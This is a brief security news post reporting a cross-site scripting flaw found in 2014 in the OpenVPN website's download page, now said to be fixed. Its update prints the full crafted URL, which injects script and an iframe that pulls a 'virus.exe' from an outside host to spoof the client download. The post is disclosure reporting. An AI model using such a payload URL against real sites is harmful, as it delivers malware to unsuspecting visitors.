Security researcher Aria Akhavan has identified a critical Cross Site Scripting vulnerability in OpenVPN website. He informed Effect-Hacking about this vulnerability as soon as he discovered it (26-11-2014).







What Is The Vulnerability Found In OpenVPN ?

Cross site Scripting, which allows an attacker to infect users who clicks on a specially crafted links to openvpn.





Aria Akhavan said " I can use the vulnerable link to insert a code which downloads a virus from an external server, but it will act like it is downloaded from the openvpn server. Also I can add HTML and Javascript which allows me to change this part of the site freely".





"The main problem is that this vulnerability is at a point where it could cause real damage", he added.





He reported the vulnerability to the Openvpn, but the vulnerability is not fixed yet. We have decided to share more technical details with the readers after the fix.

Update:



http://openvpn.net/index.php/access-server/download-openvpn-as-sw/113.html?osfamily=CentOS%253Csvg%2520onload%253Dalert%28%22XSS%22%29%253E%253Ciframe%20src%253D%22https://ioscoderz.com/virus.exe%22%253E%253C/iframe%253E

The above URL enables an attacker to spoof the download and infect the victim by tricking them to download malicious file instead of the real openVPN client. As you can see in the URL, the vulnerability was in the download section.

OpenVPN fixed the vulnerability.The specially crafted link :